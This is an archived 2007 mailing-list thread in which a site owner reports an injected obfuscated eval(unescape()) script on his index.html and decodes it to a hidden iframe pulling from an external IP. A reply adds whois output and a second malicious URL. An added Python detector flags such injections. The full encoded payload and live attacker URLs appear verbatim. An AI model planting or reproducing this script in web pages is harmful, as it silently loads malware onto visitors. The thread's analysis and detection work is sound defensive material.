[ale] I've been hacked!
Adrin
adrin at bellsouth.net
Wed Nov 21 18:43:49 EST 2007
NICE!!!!
When you click on the link, you get forwarded to another place instead.
It doesn't do anything on a Linux machine using Firefox. The page
appears to be blank.
http://72.232.116.12/~futured/frt23.php?'+Math.round(Math.random()*46683)+'a9b%5c'
And a whois 72.232.116.12
OrgName: Layered Technologies, Inc.
OrgID: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
ReferralServer: rwhois://rwhois.layeredtech.com:4321
NetRange: 72.232.0.0 - 72.233.127.255
CIDR: 72.232.0.0/16, 72.233.0.0/17
NetName: LAYERED-TECH-
NetHandle: NET-72-232-0-0-1
Parent: NET-72-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LAYEREDTECH.COM
NameServer: NS2.LAYEREDTECH.COM
Comment: Please send all abuse complaints to
Comment: abuse at layeredtech.com
RegDate: 2005-09-07
Updated: 2007-02-27
RTechHandle: JPS66-ARIN
RTechName: Suo-Anttila, Jeremy Paul
RTechPhone: +1-972-398-7998
RTechEmail: jps at layeredtech.com
OrgAbuseHandle: LAT-ARIN
OrgAbuseName: LT Abuse Team
OrgAbusePhone: +1-972-398-7998
OrgAbuseEmail: abuse at layeredtech.com
OrgNOCHandle: LIT-ARIN
OrgNOCName: LT IP-Network Team
OrgNOCPhone: +1-972-398-7998
OrgNOCEmail: ipnet at layeredtech.com
OrgTechHandle: LNT3-ARIN
OrgTechName: LT NOC Team
OrgTechPhone: +1-972-398-7998
OrgTechEmail: ipnet at layeredtech.com
# ARIN WHOIS database, last updated 2007-11-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Found a referral to rwhois.layeredtech.com:4321.
%rwhois V-1.5:001eff:00 rwhois.layeredtech.com (by Network Solutions,
Inc. V-1.5.7.3)
network:Class-Name:network
network:ID:ORG-LAYER-3.72.232.0.0/16
network:Auth-Area:72.232.0.0/16
network:Network-Name:72.232.116.1/25
network:IP-Network:72.232.116.1/25
network:Organization;I:romansemenchuk.com
network:Org-Name:romansemenchuk.com
network:Street-Address:Private Residence contact abuse at layeredtech.com
for details
network:City:Kharkov
network:State:of Kharkov
network:Postal-Code:61052
network:Country-Code:UA
network:Phone:972-398-7998
network:Tech-Contact;I:hostmaster at layeredtech.com
network:Admin-Contact;I:support at layeredtech.com
network:Abuse-Contact;I:abuse at layeredtech.com
network:Created:20070257
network:Updated:20070257
network:Updated-By:hostmaster at layeredtech.com
On Wed, 2007-11-21 at 18:33 -0500, Adrin wrote:
> whois 69.73.146.142
>
> OrgName: Jaguar Technologies LLC
> OrgID: JTL-8
> Address: 4201 SW Freeway suite#216
> City: Houston
> StateProv: TX
> PostalCode: 77027
> Country: US
>
> NetRange: 69.73.128.0 - 69.73.191.255
> CIDR: 69.73.128.0/18
> NetName: JAGUAR-TECHNOLOGIES-NOC
> NetHandle: NET-69-73-128-0-1
> Parent: NET-69-0-0-0-0
> NetType: Direct Allocation
> NameServer: NS.NOCDIRECT.COM
> NameServer: NS2.NOCDIRECT.COM
> Comment: NOCDIRECT
> RegDate: 2003-11-05
> Updated: 2005-04-15
>
> RAbuseHandle: ABUSE370-ARIN
> RAbuseName: Abuse
> RAbusePhone: +1-713-960-1502
> RAbuseEmail: abuse at jaguarpc.com
>
> OrgTechHandle: GL538-ARIN
> OrgTechName: Landis, Greg
> OrgTechPhone: +1-832-279-5529
> OrgTechEmail: greg at jaguarpc.com
>
> # ARIN WHOIS database, last updated 2007-11-20 19:10
> # Enter ? for additional hints on searching ARIN's WHOIS database.
>
> I seem to recall that IIS has/had a hosting bug of some type. From what
> I remember one virtual hosting domain could infect another on the same
> server. I wish I could remember where I read about it. I remember
> mostly that it was a RED HAT hosting site that had switched to M$ because
> of SCO Lawyers.
>
>
>
> On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> > Last summer I received notification from Google that a web page on one
> > of my web hosting accounts was infected with some sort of malware bug.
> >
> > This account only has ftp access so I changed the password for the one
> > and only ftp account and removed the offending code from my index.html
> > file. I also added a cron job to another site to compare a good
> > index.html with the one on the site that had been hacked in case they
> > came back.
> >
> > They did.
> >
> > Today I received a message that said the compare failed and found the
> > following at the top of the body in my index.html file:
> >
> > <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
> > </script>
> >
> > That script, unescaped looks like:
> >
> > window.status='Done';document.write('<iframe name=7b73
> > src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\'
> > width=351 height=133 style=\'display: none\'></iframe>'
> >
> > Has anyone seen anything like this before? I wonder what sort of evil
> > function it might perform?
> >
> > I also wonder how they got access the second time? I went through the
> > cgi scripts on that system to be sure they were mine. There aren't any
> > php files on the system.
> >
> > I attempted to look up the ip address but nslookup said it didn't exist,
> > however it pings and the index.html file from it is the default apache2
> > index file. I suspect that system has been hacked as well.
> >
> > Note the incident from last Summer was a different one.
> >
> > Thanks,
> > Jim.
> >
> >
> > _______________________________________________
> > Ale mailing list
> > Ale at ale.org
> > http://www.ale.org/mailman/listinfo/ale
>
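A detector for the kind of injection Jim describes, added here as an example (not code from the thread): it finds eval(unescape("...")) blocks in a page, decodes them the way a browser would, and reports any iframe they write that is styled to be invisible. The sample page is constructed; its host and path are placeholders.

```python
import re
from urllib.parse import unquote

# Matches eval(unescape("...")) with a single- or double-quoted literal.
EVAL_UNESCAPE = re.compile(
    r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.I | re.S)
# Pulls the src out of a (possibly backslash-quoted) <iframe ... src=\'...\'> tag.
IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc\s*=\s*\\?["\']?([^"\'\\\s>]+)', re.I)
# Styles that make the injected frame invisible to the visitor.
HIDDEN = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)


def js_unescape(s):
    """Decode like JavaScript's unescape(): %uXXXX -> code point, then
    %XX -> one code unit (latin-1, not the UTF-8 that unquote assumes)."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding='latin-1')


def scan_html(html):
    """Return one finding per eval(unescape()) block: the decoded source,
    any iframe src it writes, and whether that iframe is hidden."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(html):
        decoded = js_unescape(m.group(2))
        srcs = IFRAME_SRC.findall(decoded)
        hidden = bool(HIDDEN.search(decoded))
        findings.append({'decoded': decoded, 'iframe_src': srcs,
                         'hidden': hidden, 'suspicious': bool(srcs) and hidden})
    return findings


# Constructed sample modelled on the injection reported in the thread: every
# byte of the payload is %XX-encoded, as in the original; host/path are placeholders.
_PAYLOAD = ("window.status='Done';document.write('<iframe name=7b73 "
            "src=\\'http://attacker.invalid/~x/frt.php?'+Math.round(Math.random()*46683)"
            "+'a9b\\' width=351 height=133 style=\\'display: none\\'></iframe>')")
SAMPLE_HTML = ('<html><body><p>Welcome</p><script>eval(unescape("'
               + ''.join('%%%02x' % ord(c) for c in _PAYLOAD)
               + '"));</script></body></html>')

if __name__ == '__main__':
    for f in scan_html(SAMPLE_HTML):
        tag = 'HIDDEN IFRAME' if f['suspicious'] else 'decoded eval()'
        print(tag, f['iframe_src'])
```

Run it over a saved copy of index.html (or from the cron job Jim describes) to turn a bare "file changed" alert into "page now loads a hidden frame from host X".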